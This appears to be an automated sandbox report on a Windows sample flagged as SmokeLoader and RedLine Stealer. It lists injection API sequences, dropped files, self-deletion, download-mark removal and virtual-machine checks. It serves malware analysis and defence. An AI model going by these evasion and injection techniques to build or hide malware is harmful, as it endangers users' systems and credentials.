                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/a
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
                Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 5.2.hdeufvw.8615a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.hdeufvw.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.e6reA52T4I.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e6reA52T4I.exe.9315a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1576706084.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000005.00000002.1813482069.000000000098C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.1511973932.0000000000ABD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000002.00000002.1576706084.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00930110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_00930110
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 2_2_0040180C Sleep,NtTerminateProcess,2_2_0040180C
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 2_2_00401818 Sleep,NtTerminateProcess,2_2_00401818
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 2_2_00401822 Sleep,NtTerminateProcess,2_2_00401822
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 2_2_00401826 Sleep,NtTerminateProcess,2_2_00401826
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 2_2_00401834 Sleep,NtTerminateProcess,2_2_00401834
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 5_2_00860110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,5_2_00860110
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 6_2_0040180C Sleep,NtTerminateProcess,6_2_0040180C
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 6_2_00401818 Sleep,NtTerminateProcess,6_2_00401818
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 6_2_00401822 Sleep,NtTerminateProcess,6_2_00401822
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 6_2_00401826 Sleep,NtTerminateProcess,6_2_00401826
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 6_2_00401834 Sleep,NtTerminateProcess,6_2_00401834
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_0040F8270_2_0040F827
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_0040F4890_2_0040F489
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_0040FFE10_2_0040FFE1
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_0040EFF40_2_0040EFF4
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_0040FBF90_2_0040FBF9
                Source: C:\Windows\explorer.exeCode function: 3_2_00B3281C3_2_00B3281C
                Source: C:\Windows\explorer.exeCode function: 3_2_083F281C3_2_083F281C
                Source: e6reA52T4I.exe, 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBlamer.exe< vs e6reA52T4I.exe
                Source: e6reA52T4I.exe, 00000002.00000000.1507866565.00000000007B6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBlamer.exe< vs e6reA52T4I.exe
                Source: e6reA52T4I.exeBinary or memory string: OriginalFilenameBlamer.exe< vs e6reA52T4I.exe
                Source: e6reA52T4I.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000005.00000002.1813482069.000000000098C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.1511973932.0000000000ABD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000002.00000002.1576706084.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: e6reA52T4I.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: hdeufvw.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.evad.winEXE@6/2@2/1
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00AC3280 CreateToolhelp32Snapshot,Module32First,0_2_00AC3280
                Source: C:\Windows\explorer.exeCode function: 3_2_00B3368C CoCreateInstance,3_2_00B3368C
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hdeufvwJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: zj\0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: GhB0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: T(7a0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: 9X"e0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: Kn6B0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: Wqu0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: QMrQ0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: JG__0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: qu|a0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: ~=l@0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: a*oJ0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: =)W{0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: 35e0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: $iEz0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: X!pq0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: gew0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: ogr(0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: o%HQ0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: \Sj=0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: WTE0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: [l1h0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: fPT0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: |59M0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: O2l[0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: k'Z#0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: hRjT0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: msX?0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: c<z0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: `*T0_2_00425D20
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCommand line argument: Yx@t0_2_00425D20
                Source: e6reA52T4I.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\e6reA52T4I.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: e6reA52T4I.exeReversingLabs: Detection: 87%
                Source: unknownProcess created: C:\Users\user\Desktop\e6reA52T4I.exe "C:\Users\user\Desktop\e6reA52T4I.exe"
                Source: C:\Users\user\Desktop\e6reA52T4I.exeProcess created: C:\Users\user\Desktop\e6reA52T4I.exe "C:\Users\user\Desktop\e6reA52T4I.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\hdeufvw C:\Users\user\AppData\Roaming\hdeufvw
                Source: C:\Users\user\AppData\Roaming\hdeufvwProcess created: C:\Users\user\AppData\Roaming\hdeufvw C:\Users\user\AppData\Roaming\hdeufvw
                Source: C:\Users\user\Desktop\e6reA52T4I.exeProcess created: C:\Users\user\Desktop\e6reA52T4I.exe "C:\Users\user\Desktop\e6reA52T4I.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwProcess created: C:\Users\user\AppData\Roaming\hdeufvw C:\Users\user\AppData\Roaming\hdeufvwJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\e6reA52T4I.exeUnpacked PE file: 2.2.e6reA52T4I.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\hdeufvwUnpacked PE file: 6.2.hdeufvw.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_004117B2 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_004117B2
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00408569 push ecx; ret 0_2_0040857C
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_0040B375 push ecx; ret 0_2_0040B388
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_0093198B push ebx; iretd 0_2_009319B7
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00931970 push ebx; iretd 0_2_009319B7
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00931977 push ebx; iretd 0_2_009319B7
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00AC901F pushad ; iretd 0_2_00AC9025
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00AC4193 push ebx; iretd 0_2_00AC41BE
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00AC417E push ebx; iretd 0_2_00AC41BE
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 2_2_004011D0 push ebx; iretd 2_2_00401217
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 2_2_004011D7 push ebx; iretd 2_2_00401217
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 2_2_004011EB push ebx; iretd 2_2_00401217
                Source: C:\Windows\explorer.exeCode function: 3_2_00B31178 push 00000015h; ret 3_2_00B3117A
                Source: C:\Windows\explorer.exeCode function: 3_2_083F1178 push 00000015h; ret 3_2_083F117A
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 5_2_0086198B push ebx; iretd 5_2_008619B7
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 5_2_00861977 push ebx; iretd 5_2_008619B7
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 5_2_00861970 push ebx; iretd 5_2_008619B7
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 5_2_009981DF pushad ; iretd 5_2_009981E5
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 5_2_0099333E push ebx; iretd 5_2_0099337E
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 5_2_00993353 push ebx; iretd 5_2_0099337E
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 6_2_004011D0 push ebx; iretd 6_2_00401217
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 6_2_004011D7 push ebx; iretd 6_2_00401217
                Source: C:\Users\user\AppData\Roaming\hdeufvwCode function: 6_2_004011EB push ebx; iretd 6_2_00401217
                Source: e6reA52T4I.exeStatic PE information: section name: .text entropy: 7.320070104865159
                Source: hdeufvw.3.drStatic PE information: section name: .text entropy: 7.320070104865159
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hdeufvwJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hdeufvwJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Deletes itself after installation
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\e6rea52t4i.exeJump to behavior
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\hdeufvw:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_004257E0 GetConsoleProcessList,CharUpperA,CharToOemBuffA,CharToOemBuffA,GetConsoleProcessList,WriteProfileStringW,RegisterClassA,SetThreadContext,GetFileAttributesExA,_fputc,GetConsoleAliasW,WriteConsoleOutputCharacterA,GetFileType,GetConsoleAliasW,WriteConsoleOutputCharacterA,GetFileType,GlobalAlloc,GetWindowsDirectoryW,SetThreadAffinityMask,SetProcessShutdownParameters,GetWindowsDirectoryW,SetThreadAffinityMask,ReadConsoleOutputCharacterA,SetProcessShutdownParameters,BuildCommDCBAndTimeoutsW,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,GetPrivateProfileStringW,GetPrivateProfileStringW,AddAtomA,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomA,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleCursorInfo,VirtualProtect,InterlockedDecrement,GetCharWidthFloatW,ClearEventLogA,InterlockedDecrement,GetCharWidthFloatW,ClearEventLogA,GlobalUnfix,OpenWaitableTimerW,GlobalFlags,LocalFlags,LoadLibraryW,GetConsoleCursorInfo,SetConsoleCP,TerminateProcess,FindFirstFileA,InterlockedIncrement,GetVolumeNameForVolumeMountPointA,GetModuleHandleW,CreateActCtxA,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GetModuleHandleA,CreateEventA,ExpandEnvironmentStringsW,SetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,0_2_004257E0
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Checks if the current machine is a virtual machine (disk enumeration)
                Source: C:\Users\user\Desktop\e6reA52T4I.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\hdeufvwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\e6reA52T4I.exeAPI/Special instruction interceptor: Address: 7FF8418CE814
                Source: C:\Users\user\AppData\Roaming\hdeufvwAPI/Special instruction interceptor: Address: 7FF8418CE814
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: e6reA52T4I.exe, 00000002.00000002.1576758171.000000000056B000.00000004.00000020.00020000.00000000.sdmp, hdeufvw, 00000006.00000002.1863818319.00000000006B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 404Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 454Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 891Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 857Jump to behavior
                Source: C:\Windows\explorer.exe TID: 4912Thread sleep count: 404 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 4952Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 4772Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 2672Thread sleep count: 454 > 30Jump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_004257E0 GetConsoleProcessList,CharUpperA,CharToOemBuffA,CharToOemBuffA,GetConsoleProcessList,WriteProfileStringW,RegisterClassA,SetThreadContext,GetFileAttributesExA,_fputc,GetConsoleAliasW,WriteConsoleOutputCharacterA,GetFileType,GetConsoleAliasW,WriteConsoleOutputCharacterA,GetFileType,GlobalAlloc,GetWindowsDirectoryW,SetThreadAffinityMask,SetProcessShutdownParameters,GetWindowsDirectoryW,SetThreadAffinityMask,ReadConsoleOutputCharacterA,SetProcessShutdownParameters,BuildCommDCBAndTimeoutsW,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,GetPrivateProfileStringW,GetPrivateProfileStringW,AddAtomA,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomA,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleCursorInfo,VirtualProtect,InterlockedDecrement,GetCharWidthFloatW,ClearEventLogA,InterlockedDecrement,GetCharWidthFloatW,ClearEventLogA,GlobalUnfix,OpenWaitableTimerW,GlobalFlags,LocalFlags,LoadLibraryW,GetConsoleCursorInfo,SetConsoleCP,TerminateProcess,FindFirstFileA,InterlockedIncrement,GetVolumeNameForVolumeMountPointA,GetModuleHandleW,CreateActCtxA,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GetModuleHandleA,CreateEventA,ExpandEnvironmentStringsW,SetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,0_2_004257E0
                Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_0042545B WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_0042545B
